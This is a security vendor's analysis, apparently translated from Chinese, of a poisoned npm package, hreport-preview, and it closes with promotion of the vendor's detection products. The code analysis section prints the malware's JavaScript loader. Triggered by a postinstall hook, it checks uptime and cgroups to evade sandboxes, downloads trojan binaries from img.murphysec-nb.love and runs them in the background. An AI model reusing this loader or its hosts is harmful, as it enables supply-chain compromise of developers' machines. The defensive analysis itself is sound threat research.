In the middle lane, I found the red team boss who was poisoning in the offensive and defensive drills

background

On the evening of August 14, 2023, Murphy Security Lab released the article "The First Open Source Component Poisoning Attack Against Domestic Financial Enterprises" NPM poisoning incident analysis article, and then we monitored a new npm on August 17 The poisoning component package hreport-preview, the domain name address of the poisoning component used to download the Trojan horse file is actually img.murphysec-nb.love (as shown in Figure 1 below), and the registration time of this domain name is August 14th, the poisoner uses The registered email address is also the temporary registered email address of hotmail. Obviously, the attacker who was poisoned by us last time is rushing to the middle lane to line up with us. Brother, do you want to be so fast-_-! 

Figure 1: whois lookup

At noon that day, we also received a letter from Louis, CTO of phylum.io, a software supply chain security start-up company located in Colorado, a beautiful country on the other side of the ocean, who was also concerned about this matter (see Figure 2), asking whether the poisoning component was done by us. is embarrassing.

 Figure 2: A letter from phylum asking about the poisoning package

Poisoning incident analysis

At 7 am on August 17, Murphy Security Lab monitored that user rowebrighttix (email: [email protected]) uploaded the NPM component package hreport-preview carrying a remote control Trojan to NPM (see Figure 3).

 Figure 3: NPM repository hreport-preview component package

The title in the Readme is Integrate common functions  , and the common function names listed below come from a Chinese article (see Figure 4), so there is a high probability that the poisoner has a Chinese background.

 Figure 4: "56 JavaScript utility functions to help you improve development efficiency! "The relevant function name is mentioned in the article

code analysis

When the user installs the component package, the postinstall statement node index.js in package.json will be executed, and then the malicious Trojan horse will be downloaded from the following URLs for Windows/Mac/Linux systems respectively. The Trojan horse will contact the C2 server of the poisoner (eg: 152.195 .38.76) to establish a remote connection, and then execute malicious commands, upload/download files and other operations, suspected to be used by the red team in offensive and defensive drills:

• https://img.murphysec-nb.love/w_x32.exe

• https://img.murphysec-nb.love/m_arm

• https://img.murphysec-nb.love/l_x64

//index.js 下载恶意木马
//......

function check(){
    (async () => {
        const result = await getip();
        if (result){
            let status = false;
            let donwoload = ""
            const platform = os.platform();
            const arch = os.arch();

            if (platform === 'win32') {

                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"
                    status = true
                }

            } else if (platform === 'darwin') {

                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"m_"+arch
                    status = true
                }
            } else if (platform === 'linux') {

                donwoload="https://img.murphysec-nb.love/"+"l_"+arch
                await (async () => {
                    const result = await checkCgroup();
                    if (result) {
                        status = true
                    } else {
                        if (uptimeMinutes.toFixed(2) > 10){
                            status = true
                        }
                    }
                })();
            } else {
                return

            }

            if(status) {

                await (async () => {
                    const result = await downloadAndSaveFile(donwoload);
                    if (result !=null){
                        if (platform === 'linux' ||platform === 'darwin' ){
                            addExecutablePermission(result)
                        }
                        runInBackground(result)

                    }

                })();
            }else {
                process.exit(0);
            }
        }
    })();

}

IOC

 

reference link

• https://mp.weixin.qq.com/s/_bYduwlqMT3P5xQbtwg3FA

• https://www.npmjs.com/package/hreport-preview

• https://juejin.cn/post/7019090370814279693

Troubleshooting tools and poisoning intelligence

Murphy Security provides products that can block poisoning targeting open source components in real time

Murphy Security's private source gateway product can detect and intercept poisoning events in central warehouses such as npm, pip, and maven in real time, and supports baseline management of high-risk vulnerabilities. Dozens of customers such as China Mobile have landed applications.

Murphy Security provides real-time open source component poisoning intelligence warnings, which can be subscribed

Murphy Security’s 0-day vulnerability and poisoning intelligence covers the latest 0day, 1day and poisoning intelligence warnings. All intelligence has been strictly researched and judged by security experts to ensure that enterprises can obtain first-hand high-quality vulnerability and poisoning intelligence, which is even better than CVE. There are more than 25 additional detailed analysis fields in the vulnerability library. At present, this product has been applied in dozens of customers such as Ant, Meituan, and China Telecom.

Enterprises with the above functions can apply for a trial in the following ways:

1. Long press the QR code to apply:

 

2. Visit the application link:

https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe